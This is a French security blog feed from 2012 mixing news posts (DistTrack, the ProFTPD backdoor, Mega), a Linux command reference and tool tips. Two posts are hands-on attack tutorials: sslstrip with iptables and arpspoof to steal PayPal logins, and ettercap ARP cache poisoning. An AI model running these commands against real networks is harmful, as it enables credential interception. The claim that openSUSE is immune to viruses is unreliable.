Hajari Security

un coup d'oeil sur le malware DistTrack

noreply@blogger.com (Anass Hajari) — Tue, 30 Oct 2012 00:24:00 +0000

DistTrack fait partie de la série d'attaques avec des botnets ciblant des infrastructures vitales au cours des derniers mois. Il n'est pas certain que cette attaque particulière soit le fait d'un Etat: un groupe inconnu "Arab Youth Group" l'aurait revendiqué sur Pastebin.

Il serait formé de trois composants :

Un ver pour sa propagation (se recopie dans des partages réseau, notamment avec les noms 'clean.exe' et 'dvdquery.exe')
Deux charges

La première chargée de repérer les fichiers à effacer (document, download, desktop, video, music, picture sont parmi les mots clés recherchés)
La seconde chargée de communiquer avec le système de commande et de contrôle (pour rendre compte des listes de fichiers effacés et de l'adresse IP de la machine victime)

Victimes remarquables

Saudi Arabian Oil Comp. (Saudi Aramco)
RasGas (Qatar)

GNU/Linux: Les commandes de bases

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 23:58:00 +0000

Les répertoires sous linux

/boot : Répertoire contenant le noyau Linux et le ramdisk
/bi : Répertoire contenant les exécutables de base, comme par exemple : cp, mv, ls, …
/dev : Répertoire contenant des fichiers spéciaux comme devices qui permettent lel ien avec les périphériques de la machine
/etc : Répertoire contenant tous les fichiers de configuration
/home : Répertoire contenant les répertoires personnels des utilisateurs
/lib : Répertoire contenant les librairies et les modules du noyau (/lib/modules)
/lost+found : Répertoire spécial contenant les fichiers récupérés suite à un problème sur le filesystem
/proc : Ce répertoire contient les fichiers du système de fichiers des processus
/root : Répertoire personnel de l’administrateur
/sbin : Répertoire contenant les exécutables destinés à l’administration du système
/tmp : Répertoire contenant des fichiers temporaires utilisés par certains programmes
/usr : Répertoire contenant les exécutables des programmes (/usr/bin et /usr/sbin), la documentation (/usr/doc), les bibliothèques (/usr/lib), …
/var : ntient des fichiers variables comme la file d’attente de l’imprimante, des données de serveurs http, mail…et les fichiers de logs notamment dans /var/log)

Commandes Système de fichiers

ls : liste le contenu d’un répertoire
cd : se déplace dans un répertoire
cp : copie un fichier
mv : déplace/renomme un fichier
rm : supprimer un fichier
mkdir : crée un dossier
rmdir : supprime un dossier
ln : crée un lien vers un fichier ou dossier
find : cherche un fichier dans l’arborescence
du : donne l’occupation disque par dossier
df : donne l’occupation disque par partition montée
pwd : renvoie le répertoire courant (dans lequel l’utilisateur se trouve)
file : renvoie le type d’un fichier (image, texte, binaire, …)
which : renvoie le chemin d’accés d’un fichier
stat : renvoie le statut d’un fichier (droits, attributs, propriétaire, …)
touch : crée un fichier s’il n’existe pas ou change sa date d’accés s’il existe

Commandes des droits

chmod : change les droits sur un fichier ou dossier
chown : change le propriétaire
chgrp : change le groupe propriétaire

Commandes sur les fichiers

cat : affiche le contenu d’un fichier
more : affiche le contenu d’un fichier page par page
less : affiche le contenu page par page avec possibilité de remonter en arrière
cut : découpe le contenu d’un flux, ligne par ligne
grep : recherche l’occurence dans un fichier
tr : transforme une liste de caractère en une autre liste
sort : trie le flux d’entrée
head : affiche l’entête du fichier
tail : affiche les dernières lignes d’un fichier

Commandes utilisateurs

id : renvoie les informationss UID – GID d’un utilisateur
groups : renvoie la liste des goupes dont l’utilisateur fait partie
passwd : change le mot de passe
who : affiche la liste des utilisateurs connectés à une machine (ordinateur)
halt : ordonne l’arrêt du système
reboot : ordonne le redémarrage/reboot du système
set : affiche/fixe les variables d’environnement
alias et unalias : crée et supprime un alias de commande
echo : affiche un texteà l’écran

Commandes processus

ps : liste les processus actifs
kill : envoie un signal à un processus
top : affiche et classe les processus actifs (cpu – mém – temps)
bg : passe un processus en tache de fond (background)

Informations sur les droits pour les fichiers

-r : droit en lecture, permet de voir le contenu du fichier
-w : droit d’écriture, permet de modifier le fichier
-x : droit d’exécution, permet d’exécuter le programme contenu dans le fichier

Informations sur les droits pour les dossiers

-r : droit de lecture, permet de voir le contenu du dossier
-w : droit d’écriture, permet de créer/supprimer des fichiers dans le dossier
-x : droit d’entrée, permet d’entrer dans le dossier

Autre commandes utiles

tar xvf : détar un fichier type xxxx.tar
tar xvfz : détar un fichier gzipé xxxx.tar.gz
tar xvfj : détar un fichier bzipé xxxx.tar.bz2
tar cvfz <xxx.tar.gz> <fichier_ou_repertoire> : tar un fichier ou répertoire en le gzipant
gzip -d <fichier.gz> : dézip le fichier

openSUSE: un système linux sécurisé

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 22:59:00 +0000

OpenSUSE est un Système Linux, ou plutôt un des nombreux système d'exploitation Libre Linux.

OpenSUSE a été racheté par Novell, société éditrice de logiciels.

Le 3 novembre 2006, Novell a signé un accord historique avec la société Microsoft portant entre autre sur l'amélioration de l'interopérabilité d’openSUSE avec Microsoft Windows.

openSUSE est un système stable à l’abris des vers et des virus informatique.

Une très bonne vidéo d’animation divertissante et fort bien faite :

Le petit bonhomme vert au look martianoïde, symbolise openSUSE, un Système d’Exploitation (au même titre que Windows).

Une Hackeuse de 75 ans invente un nouveau Virus Physique nommé Spade

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 22:43:00 +0000

On connaît, pour hacké ou pirater Internet, les virus virtuels qui sont des lignes de code.

Mais il existe une autre façon de planter Internet : le virus physique.

Une retraitée Géorgienne de 75 ans, surnommée «the spade hacker» (la hackeuse à la pelle) en est la dernière illustration.

Celle-ci, en creusant un trou dans le sol, certains disent que c’est en voulant récupérer du cuivre, a, par inadvertance, coupée une fibre optique qui alimentait, en Internet, le réseau trop centralisé de l'Arménie et alimenté par la Géorgie.

Une classe de virus à fait ses preuves, c’est la classe des virus physique : celui-ci pourrait s’appeler : Spade ou Showel.

Un logiciel de mise à jour logicielle

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 22:35:00 +0000

Quand un ordinateur n’a pas la dernière version de tous les logiciels installés à bord, celui-ci est en danger, il peut exister des failles de sécurité par où vont s’infiltrer des « bestioles » malfaisantes, souvent un trojan, qui travaillera en douce, sans se faire remarquer, pouvant transformer votre ordinateur en ordinateur zombie parfois, même, mais c’est plus rare, un bon gros virus qui se fera un plaisir de mettre de l’ordre dans votre ordinateur.

Il existe une solution logicielle permettant de mettre à jour tous les logiciels de son ordinateur, y compris, bien sûr, les mises à jour de Windows et de Microsoft Office, cela marche aussi pour firefox, thundirbird….

Ce logiciel, c’est : Secunia PSI. Il est téléchargeable à cette adresse :

http://secunia.com/vulnerability_scanning/personal/

Le principe est très simple, Secunia scannera tous les logiciels installés sur votre ordinateur et vous donnera en pourcentage, le niveau de sécurité de votre ordinateur, en fonction du nombre de logiciels « up to date ».

Alors, installez-le, et préparez vous à quelques surprises, vous ne serez certainement pas à 100 %.

Si c’est le cas, alors au travail, secunia vous indiquera les logiciels à upgrader.

comment surfer anonyme sur Internet

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 22:22:00 +0000

Le fait de pouvoir changer d’IP, permet de surfer anonymement, et en toute discrétion, sur la toile, et en particulier de prendre une adresse IP dans un pays (par exemple les Etats Unis, ce qui permet, alors, de voir, en streaming, des séries américaines que l’on ne pourrait voir, car n’étant pas dans ce pays).

Ce petit soft s'appelle :
"ChrisPC Free Anonymous Proxy."

Site de téléchargement : http://www.chris-pc.com/proxy/

Un Backdoor dans le logiciel ProFTPD

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 21:49:00 +0000

Un pirate informatique 'hacker' modifie le logiciel ProFTPD et cache une backdoor dans la version téléchargeable. Une alerte de sécurité vient d'être émise par les développeurs du logiciel ProFTPD, un programme serveur FTP très populaire.
Un pirate informatique à compromis l'espace numérique de ProFTPD (ftp.proftpd.org/rsync.proftpd.org) qui permet le téléchargement du logiciel. L'intrus a modifié le fichier d'origine, ProFTPD 1.3.3c, par une version piégée contenant une backdoor, une porte cachée.
D'après les responsables du site, toutes les versions téléchargées sont considérées comme comprises.
La version "pirate" permet aux intrus d'avoir un accès root sur un système utilisateur de ProFTPD.
Pour confirmer l'intégrité d'un logiciel, il est vivement conseillé de vérifier les sommes MD5 et les signatures PGP des fichiers téléchargés afin de les comparer avec la source originale du programme.

L’éditeur français 'ASP64' lance G.B

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 21:11:00 +0000

L’éditeur français ASP64 lance Gorde Backup sa nouvelle solution de sauvegarde informatique dédiée aux professionnels et vendue en ligne.

Gorde (qui signifie garder, protéger) se positionne sur le marché très concurrentiel de la sauvegarde avec une offre de service à destination des entreprises, collectivités, travailleurs indépendants et associations.

La solution systématise et automatise la sauvegarde des fichiers informatiques importants des organisations. Ceux-ci sont dupliqués en dehors de l’entreprise pour être restaurés en cas de besoin (erreurs, corruptions , sinistres,...) dans la version chronologique souhaitée.

Derrière une interface logicielle claire et ergonomique, Gorde repose sur une architecture « cloud » de sauvegarde redondée, le chiffrement à 2 niveaux des informations externalisées et une couche de service "proactif" avec engagement de résultat contractuel.

Les données jouissent d’une confidentialité totale grâce à un chiffrage PBE et au protocole de transfert SSL.

megaupload is back

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 19:55:00 +0000

MegaUpload doit renaitre de ses cendres le 19 janvier sous le nom de Mega. Son fondateur annonce des cadeaux pour les anciens Premiums. Ils sont plus de 50 millions d'utilisateurs à attendre la chose depuis bientôt un an, depuis la fermeture par la police New Zélandaise de MegaUpload (avec l'aide du FBI, des Douanes Hongkongaise..).
Kim Dot Com, le très mégalomane fondateur de MegaUpload, a annoncé sur Twitter qu'il remettait en route son entreprise de stockage de fichiers. Mega, le nouveau nom de ce service, sera lancé le 19 janvier 2013, date anniversaire de la fermeture, par la justice américaine, de MegaUpload. C'est du moins ce qu'annonce Kim Schmitz dans les colonnes de Wired.
Kimdotcom explique que son "Mega" permettra le partage de fichier via un système Cloud chiffré. Dans le premier cas, le film pirate proposé par Mega ne sera pas intégralement sauvegardé sur 1 serveur, mais plusieurs. DotCom exploite tout simplement l'idée du warez. Plusieurs serveurs, dispatchés dans plusieurs pays. Si un serveur est fermé, il est remplacé par un autre, sans risque de coupure pour les copieurs. Les adeptes de "HQ warez" et autres "Stros" ont certainement aussi sourit à lisant que le tout sera sécurisé par du chiffrement. Bref, une méthode utilisée par les pros des contrefaçons sur Internet depuis des années. Dot Kom va exploiter l'idée à son profit.
Autant dire que du côté du gouvernement américain, les dents grincent. En attendant, l'audience judiciaire liée à la demande d'extradition vers les États-Unis de Kim Dotcom a été reportée à mars 2013. A noter que le 21 janvier 2012, devait, parait-il, être lancé MegaBox, filiale de MegaUpload, espace destiné à faire gagner de l'argent aux artistes. Mega doit prendre le relais... ou pas !
KimDotCom, et ses "200" employés pourraient remercier les clients de l'option "Premium" de MegaUpload en leur faisant un cadeau, au lancement, de Mega. Le "premium" permettait, contre le paiement d'un passe droit, de télécharger rapidement et sans publicité, ni restriction. DotCom a gardé les logins, pseudos et mots de passe de ses "clients" ?

[FILM] : CYBERGEDDON

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 19:29:00 +0000

Mes amis de Symantec ont bossé avec Anthony E. Zuiker, le créateur de la série Les Experts (CSI en anglais) pour produire un long métrage baptisé Cybergeddon. Il s’agit d’un film qui a pour thème principal la cybercriminalité et qui raconte l’histoire de Chloe Jocelyn, un agent chargé d’enquêter sur une série de cyber-attaques apparemment sans lien, et de son coéquipier Frank Parker.

Nos 2 héros sont aidé par Chase Rosen, dit “Rabbit”, un virtuose du hacking placé derrière les barreaux. Chloe et son équipe ont pour mission de démanteler, avant qu’il ne soit trop tard, le réseau mondial de cybercriminels dirigé par Gustov Dobreff. Dans un monde où nous sommes tous connectés par le Web, tout le monde court un risque.

Un hacker Français arrêté, après avoir volé 500.000 euros

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 19:22:00 +0000

Les policiers Français de l'OCLCTIC ont arrêté un pirate informatique qui avait créé un virus pour téléphone portable. Les chercheurs de l'OCLCTIC, qui ne sont pas pourtant des grands communicants, viennent d'annoncer l'arrestation d'un pirate informatique pas comme les autres. L'homme, originaire d'Amiens, dans le Nord de la France, a inventé un virus informatique pour smartphones qui lui aurait permis de voler 500.000 euros. La plus grosse affaire pour les Officiers de Police Judiciaire de l'Office central de lutte contre la criminalité liée aux techniques informatiques et de la communication.

La technique du pirate n'est pas nouvelle. Une fausse application sous Android qui récupérait les codes de micro-paiement. Les applications diffusaient des SMS surtaxés que les propriétaires ne voyaient pas passer. Accro aux jeux en ligne, il blanchissait ainsi son forfait sur la toile via des loteries. La fraude est estimée à plus de 500.000 euros. Le codeur, qui avait mis en ligne plusieurs versions de sa "bestiole" risque aujourd'hui 5 ans de prison.

RUBY ON RAILS !

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 18:51:00 +0000

Rails is a web application development framework written in the Ruby language. It is designed to make programming web applications easier by making assumptions about what every developer needs to get started. It allows you to write less code while accomplishing more than many other languages and frameworks. Experienced Rails developers also report that it makes web application development more fun.

source

Attaque Man In The Middle sur le protocole HTTPS

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 00:32:00 +0000

A travers ce tutoriel, nous allons voir comment il est possible de s’attaquer à une connexion encryptée (SSL) grace à Sslstrip qui va rediriger tout le trafic https vers du http en donnant l’illusion à la victime qu’elle est bien sur une connexion sécurisée. Pour l’illustration, nous allons récupérer les identifiants et mot de passe d’un compte paypal (le mien en l’occurence).

1/ Https et SSL: quelques explications

La majorité des utilisateurs qui surfent sur le web ont déja entendu ce mot: https (hyper text transfert protocol secured). Il est synonyme de connexion sécurisée et permet d’encrypter des données sensibles sur des sites web bancaires par exemple, afin d’éviter une éventuelle interception des données. Grace à un système de certificats, le navigateur va pouvoir s’assurer que le site web auquel il est connecté est bien celui qu’il prétend etre. Un tiers de confiance est utilisé pour cela, on l’appelle le CA (certificate authority). Pour résumer et ne pas s’embarquer dans des explications techniques trop poussées, c’est en comparant le certificat du site sur lequel il est connecté et le certificat du CA (le tiers de confiance) que le navigateur va s’assurer qu’il est bien connecté à un site sécurisé. Le port par défaut pour le https est le port 443, alors que le port par défaut pour le http classique est le port 80. Une fois connecté en https, les informations qui vont transiter entre le navigateur et le serveur web seront encryptées via SSL (secured socket layer), un protocole de cryptage très sur permettant de sécuriser les données.

2/ Sslstrip: la naissance de l’outil

Sslstrip est né d’un constat simple:

La majorité des utilisateurs ne regardent pas l’url affichée dans la barre d’adresse de leur navigateur, et quand il leur apparait un message d’erreur la plupart du temps ils clickent sur ok sans savoir ce qu’ils font.
Les utilisateurs se fient à une impression, un sentiment, un ressenti basé sur ce qu’ils voient:
-des indicateurs qui disent que la page est sécurisée
-des icones avec un cadenas qui apparaissent ici ou là
-la barre d’adresse qui change de couleur
Lorsque ces éléments sont réunis, l’utilisateur pense que la page est sécurisée.

Quand on veut s’attaquer à du https, le but est donc de maintenir la confiance, et de ne pas éveiller la suspiscion de l’utilisateur en affichant un message d’alerte disant que le certificat n’a pas été émis par une autorité approuvée ou ce genre de chose qui pourrait paraitre anormale.
En résumé, pour duper l’utilisateur il ne faut pas lui afficher de messages d’alerte, et il faut le maintenir dans un environnement visuel qui va lui laisser penser qu’il est sur un site sécurisé.

3/ Comment les utilisateurs arrivent ils sur du https?

Très peu de personnes tapent directement https dans leur barre d’adresse, en fait les 2 façons d’arriver sur du https lorsqu’on surfe le web de manière classique sont les suivantes:

-en clickant sur un lien
-en suivant une redirection (302)

En effet, sur la plupart des sites proposant du contenu sécurisé en https, il faut dans un premier temps passer par une page http (accueil par exemple) avent d’etre redirigé vers une page sécurisée. C’est le cas sur les sites bancaires, sur google mail, paypal etc… La grande majorité des sites web proposant du contenu sécurisé en https ont une page d’accueil en http.

Sslstrip ne va pas attaquer le https, il va attaquer le http. Il va transformer tous les liens https sur le poste victime en liens http, et garder en mémoire tout ce qui a changé en créant une map (carte).
Résultat:
-le serveur ne voit rien, pour lui la connexion est toujours encryptée
-le client ne voit aucun message d’alerte dans son navigateur
-l’attaquant peut sniffer toutes les données car elles transitent en clair

Grace a ce procédé, il est très difficile de différencier la véritable page https cryptée via ssl de la fausse page http renvoyée par sslstrip.
Cela dit, comme on l’a évoqué les utilisateurs sont habitués à voir une image de cadenas lorsqu’ils basculent sur une page sécurisée, cette icone représentant un cadenas est à leurs yeux un gage de sécurité.
Sslstrip va donc falsifier les réponses aux requetes favicon (une favicon est la petite image située à gauche de la barre d’adresse du navigateur) du navigateur, et afficher en guise de favicon un petit cadenas, comme celui ci:

4/ Sslstrip en pratique: installation et configuration

Sslstrip est un outil développé par Moxie Marlinspike, vous pouvez le trouver sur son site web:thoughtcrime.org. Voici un schéma basique qui illustre son fonctionnement:

Tout d’abord nous allons l’installer (sur Backtrack):

wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.2.tar.gz
tar xvzf sslstrip-0.2.tar.gz
cd /sslstrip-0.2
python setup.py install

Le soft étant installé, il va falloir activer l’ip forwarding et rediriger le trafic http avec iptables:

echo « 1″ > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 15000

Ici, nous redirigeons le trafic http (port 80) vers le port 15000. C’est sur ce port que nous allons mettre Sslstrip en écoute. Voyons d’abord les différentes options offertes par Sslstrip:

sslstrip 0.2 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, –write=<filename> Specify file to log to (optional).
-p , –post Log only SSL POSTs. (default)
-s , –ssl Log all SSL traffic to and from server.
-a , –all Log all SSL and HTTP traffic to and from server.
-l <port>, –listen=<port> Port to listen on (default 10000).
-f , –favicon Substitute a lock favicon on secure requests.
-k , –killsessions Kill sessions in progress.
-h Print this help message.

Nous utiliserons donc la commande suivante:

python sslstrip.py -w log.txt -a -l 15000 -f

Ici nous lançons Sslstrip en écoute sur le port 15000, et nous enregistrons les informations récoltées dans le fichier log.txt.

Maintenant que Sslstrip est en écoute, nous allons pouvoir lancer l’arp poisoning qui nous placera en situation de man in the middle sur le réseau. Le fait que le réseau soit switché ne pose aucun problème, le man in the middle peut etre effectué avec ettercap ou bien dans le cas de notre exemple avec arpspoof:

arpspoof -i eth0 -t 192.168.1.25 192.168.1.1

Sur cet exemple, la machine victime a l’ip 192.168.1.25 et le routeur est en 192.168.1.1.

5/ Sslstrip: l’attaque (du https au http)

La plupart des outils permettant d’effectuer une attaque man in the middle sur du SSL (https) fournissent au navigateur de la machine victime un faux certificat SSL n’ayant pas été émis pour le site visité. Le résultat est un message d’alerte dont voici deux exemples:

-Sous Firefox

Sous Internet Explorer:

Nous allons maintenant voir ce qu’il se passe avec Sslstrip… Aucun message d’alerte ne s’affiche, bien au contraire. L’ordinateur victime va se connecter à paypal. Il arrive sur la page d’accueil, en http:

L’utilisateur clique sur le bouton « Connectez vous », c’est là qu’il devrait normalement etre redirigé vers du https. Ici, on peut voir que la favicon représentant le cadenas est déja affichée dans la barre d’adresse, et on pourrait donc se croire sur un site sécurisé. Voici la page de login:

Pour info, et histoire de comparer, voici ce que donne la véritable page de login paypal en https:

La différence se situe au niveau de la barre d’adresse.La vraie page affiche une adresse en https et la partie gauche de la barre devient verte, en affichant le nom du propriétaire du certificat SSL. Sur la page « stripped », l’adresse est en http classique, et on peut voir un cadenas sur la gauche (ce n’est bien sur en réalité qu’une favicon, mais combien de personnes savent ce qu’est une favicon, et surtout combien de personnes sont suffisamment attentives pour remarquer ce genre de petit détail, surtout que jusqu’ici aucun message d’alerte n’a été affiché?). Notre utilisateur continue à surfer, il valide son identifiant ainsi que son mot de passe et se retrouve donc en toute logique connecté à son compte paypal:

Pendant ce temps, du coté de l’attaquant on peut voir de l’activité sur le serveur:

En ouvrant le fichier de log que nous avions nommé log.txt, on peut trouver ceci:

2009-02-28 19:10:33,794 Sending header: content-type: application/x-www-form-urlencoded

2009-02-28 19:10:33,794 SECURE POST Data (www.paypal.com): login_cmd=&login_params=&login_email=test%40dexter&login_password=mot-de-passe&target_page=0&submit.x=Connectez-vous&form_charset=UTF-8&browser_name=Firefox&browser_version=3&operating_system=Windows

2009-02-28 19:10:36,025 Read From Server:

HTTP/1.1 302 Found

Date: Thu, 30 Apr 2009 15:06:12 GMT

Server: Apache

Cache-Control: private

Pragma: no-cache

Expires: Thu, 05 Jan 1995 22:00:00 GMT

Set-Cookie: navcmd=_login-submit; domain=.paypal.com; path=/

Set-Cookie: consumer_display=USER_HOMEPAGE%3d2%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d5; expires=Fri, 30-Apr-2010 15:06:14 GMT; domain=.paypal.com; path=/

Set-Cookie: login_email=test%40dexter; expires=Tue, 27-Oct-2009 15:06:14 GMT; domain=.paypal.com; path=/

La partie intéressante est bien sur celle ci:

login_email=test%40dexter&login_password=mot-de-passe

On retrouve le nom de l’utilisateur ainsi que son mot de passe (%40 est l’encodage ascii de @). Ainsi, nous avons récupéré ceci:

nom d’utilisateur: test@dexter
mot de passe: mot-de-passe

Dans une transparence quasi parfaite… Ce tutoriel illustre une fois de plus le danger des attaques man in the middle, j’éspère qu’il attirera votre attention sur le fait qu’il est extrèmement dangereux de se connecter à un réseau « unsecured », qu’il s’agisse d’un hotspot ou autre. Si vous n’etes pas sur à 100% du réseau sur lequel vous etes connecté, alors ne vous connectez pas à des sites sensibles, n’envoyez aucune donnée importante et surtout soyez toujours vigilant lorsque vous vous connectez à un site sécurisé, la barre d’adresse doit clairement indiquer https .

Comment devenir un hacker ?

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 00:16:00 +0000

Pour devenir un bon hacker il existe plusieurs points essentiels qu’il faut les maîtriser :

1. Apprendre à utiliser le réseau
C’est à dire apprendre à chercher sur le net les informations et les programmes dont vous avez besoin (savoir utiliser de façon efficace un moteur de recherche est le minimum). Ne pas perdre de temps avec des documents à l’apparence douteuse.

2. Apprendre à lire l’anglais
Il faut apprendre à maitriser l’anglais pour savoir lire les articles qui sont relié à ce domaine, car la plupart de ces articles sont en anglais.

3. Savoir comment marche les choses qui sont dans votre ordinateur
Vous devrez connaître au moins les principaux composants qui constituent votre ordinateur, et réussir à remplacer un disque dur ou autre sans problème.

4. Commencer à programmer
Commencer à programmer est difficile, mais après quelques heures il se peut que vous ayez tout à coup une étincelle d’enthousiasme pour crée une chose n’existant pas.

Commencer par HTML, il est très simple après utiliser des langages comme C, Perl après java et c++

5. Etudier les systèmes de sécurité et de cryptographie
Le plus important pour un hacker c’est d’étudier les systèmes de sécurité et de cryptographie, un hacker passe la plupart de son temps devant l’ordinateur et sur les réseaux et il donne beaucoup de valeurs à ses données.

pour apprendre à violer un système cryptographique, un bon début sera par exemple les jeux de mots croisés.

6. connaître les protocoles des réseaux
Connaître le réseau et son fonctionnement est fondamental comme savoir utiliser un ordinateur jusqu’à comprendre pourquoi les câbles de réseau sont faits d’une certaine manière.

7. Utiliser un système Unix open source, comme LINUX ou BSD
Chaque système est bon pour accélérer, également ceux des ordinateurs désormais obsolètes. Pour faire les choses sérieusement, pourtant, à un certain point il est inévitable de se servir d’un système Linux. Comme dans la programmation les premiers jours sont difficiles : ne renoncez pas. En peut de temps vous serez capable de faire des choses impensables avec un système d’exploitation propriétaire tel que Windows

Microsoft offre 260 000 dollars pour un concours de sécurité

noreply@blogger.com (Anass Hajari) — Mon, 29 Oct 2012 00:11:00 +0000

Microsoft a offert une récompense de 260 000 dollars à des chercheurs en sécurité, dans le cadre du concours Blue Hat.

Lancé il y a de cela un an lors de la conférence sur la sécurité Black Hat, le prix Blue Hat a pour objectif d’inciter les chercheurs en sécurité à proposer de nouveaux systèmes de défense pour Windows.

Pour cette année qui a vu la participation d’une vingtaine de chercheurs informatiques, il fallait soumettre des idées pour résoudre un problème de sécurité complexe basé sur le Return-Oriented Programming (ROP).

Le premier prix a été décerné à un doctorant en informatique du nom de Vasilis Pappas pour sa solution KBouncer, permettant de bloquer les attaques ROP. Il a reçu une récompense de 200 000 dollars.

« Nous avons lancé un défi à la communauté des chercheurs, en leur demandant de ne plus juste identifier et révéler des failles, mais de s’investir également dans des types de recherche pouvant atténuer des attaques », explique Mike Reavey, directeur de Microsoft Security Response Center (MSRC)

Le second prix de 50 000 dollars a été décerné à Ivan Fratric, un chercheur de l’université de Zagreb en Croatie, pour l’application ROPGuard, permettant également de détecter et prévenir les attaques ROP. Enfin, le troisième prix de 10 000 dollars a été attribué à Jared DeMott.

Les solutions proposées par les finalistes ont été intégrées dans un ensemble d’outils Windows pour la protection contre les menaces.

Attack ARP cache poisoning en pratique

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 23:59:00 +0000

On parle souvent des failles applicatives concernant l’erreur humain, dans cet article, nous allons voir que des vulnérabilités peuvent aussi venir des protocoles réseaux.

L’arp cache poisoning est une attaque qui consiste à exploiter la faille du protocole ARP situé en couche 3 du modèle OSI. Il consiste à bombarder un routeur de requête ARP en lui faisant croire que l’on est quelqu’un d’autre. Au bout d’un moment, cela va provoquer la mise à jour du cache ARP. Le but est de se placer entre la victime et son routeur afin de capturer tout le trafic entre deux machines distantes.

A quoi sert le protocole ARP ?

Le protocole ARP permet de connaître l’adresse physique d’une carte réseau correspondant à une adresse IP, c’est pour cela qu’il s’appelle Protocole de résolution d’adresse.

Le protocole ARP permet de déterminer l’adresse MAC d’une machine distante. Lorsqu’une machine souhaite connaître l’adresse MAC d’une autre, elle envoie à tous les membres de son sous-réseau un packet arp who-as en demandant quelle est l’adresse MAC de la machine qui a telle adresse ip.

La machine qui possède cette adresse IP sera la seule à répondre en envoyant à la machine émettrice une réponse ARP du type « je suis adresseIP et voici mon adresse MAC ».

La machine à l’origine de la requête ARP reçoit la réponse, met à jour son cache ARP et peut donc commencer à envoyer des messages.
Le contenu de ce cache est temporaire. Cela signifie qu’il faudra tout de même réitérer l’envoi de requête ARP mais de façon beaucoup moins fréquente.

Pour voir le contenu du cache sous windows, tapez la commande suivante :

arp -a

sous Linux :

arp -n

Ou se situe la faille du protocole ARP ?

Avec le protocole ARP, nous pouvons communiquer à une machine notre adresse MAC à n’importe quel moment en lui envoyant un simple packet ARP reply. Cela mettra à jour son cache ARP. Maintenant, imaginez qu’on envoie un packet arp reply à une machine avec de fausses informations…C’est à ce moment que l’arp cache poisoning intervient . On peut facilement passer pour une machine qu’on n’est pas et de ce fait intercepte le dialogue entre deux hôtes.

Comment réaliser cette attaque ?

Lors d’une navigation normale sur internet, les données d’un utilisateurs sont envoyées au routeur, puis du routeur, sont envoyées au serveur web.
Lors d’une attaque de type ARP poisoning, le pirate va se glisser entre les données envoyés par l’utilisateur et le routeur.

Pour réaliser ce type d’attaque et capturer du trafic entre deux hôtes distants, il est possible de se munir de différent outils. Ici nous utiliserons l’outil « Ettercap » qui est spécialisé dans ce genre de domaine.
Ettercap est un logiciel libre. Pour l’installer, lancez la commande suivante :

apt-get install ettercap wireshark

Une fois installé, il suffira de taper :

ettercap -T -q -M arp:remote /192.168.230.128/ /192.168.230.1/ -w « monfichier »

Explication de la commande :

-T : lance ettercap en mode texte
-M : indique que l »on doit se placer entre les deux ip’s et que l’on veut une attaque de type « Man in the middle »
-W : enregistre le résultat de la capture dans un fichier

Dans mon cas, la machine cible a l’adresse IP 192.168.230.128 et le routeur de sortie a l’adresse IP 192.168.230.1

Pour finir l’attaque et récupérer les données, il faut appuyer sur la touche q.

Enfin vous pouvez ouvrir le fichier sorti « monfichier » avec un logiciel comme « Wireshark » pour analyser chaque requête faite à travers le réseau.

How to use Jabref behind a proxy

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 23:48:00 +0000

Jabref, a powerful tool to manage bibliography, has a special feature that let the user search bibtex entries online, and import them within your bibliography.

A problem occurs when you run JabRef behind a proxy (corporate or not), because no options is available to configure it.

Hopefully, JabRef is provided as a jar so we have the ability to modify proxy properties used by java.

Just run the following command :

java -Dhttp.proxyHost= »proxy » -Dhttp.proxyPort= »8080″ -jar « /where/is/the/jar/JabRef-2.6b2.jar »

That’s it, you can search for whatever you want on ACM portal, IEEE, etc…

Comment créer/lire son Qr Code sous Linux

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 23:43:00 +0000

Les QR-Codes (Quick Response Code) sont des code-barres en deux dimensions qui permettent de diffuser des informations de manière originale. Issus du milieu industriel, mais aujourd’hui utilisés comme supports publicitaires ou à titre informatif, ces codes fleurissent un peu partout. Ils sont aussi devenus facilement lisibles avec un Smartphone. Sous Linux, il est possible de créer et de lire ces QR-Codes. On va voir comment.

Créer un QR-code avec qrencode

Qrencode est une librairie libre développée par Kentaro Fukuchi. Elle permet de créer des QR-Codes au format d’image png. Le principe de codage est expliqué dans cet article de Wikipedia.

Installation sous Debian/Ubuntu

# apt-get install qrencode

Utilisation

$ qrencode -o nomdefichier.png « texte à coder »

On obtient alors une image comme celle-ci, parfaitement lisible :

Lire un QR-Code en ligne

Il existe des outils en ligne qui permettent de lire et d’interpréter les QR-Codes comme ZXing. En versant le fichier image ou en indiquant l’adresse du fichier à analyser, ZXing permet d’extraire l’information rapidement.

Lire un QR-Code localement

On va utiliser les outils du package zbar-tools, développés par le projet Zbar.

Installation

# apt-get install zbar-tools

Utilisation

Zbar permet de lire tout type de fichier image et d’y rechercher la présence d’un QR-Code.

$ zbarimg -d nomdefichier.png

Si l’image contient bien un QR-Code, les informations contenues dans celui-ci apparaissent. Par exemple, l’image ci-dessous reste parfaitement exploitable par Zbar :

QR-Code et correction des erreurs

Les mécanismes de création et de correction d’erreurs des QR-Codes sont assez robustes et permettent de retrouver l’intégralité des informations contenues dans l’image, même si jusqu’à 30% du codage est devenu illisible. On peut alors utiliser cette capacité de restauration pour personnaliser l’image avec un contenu tiers.

Chiffrez vos fichiers top secret avec Openssl

noreply@blogger.com (Anass Hajari) — Sun, 28 Oct 2012 22:15:00 +0000

Vous connaissez sûrement tous openSSL, l’implémentation open source des protocoles SSL et TLS, qui vous a certainement servit pour générer des certificats SSL.

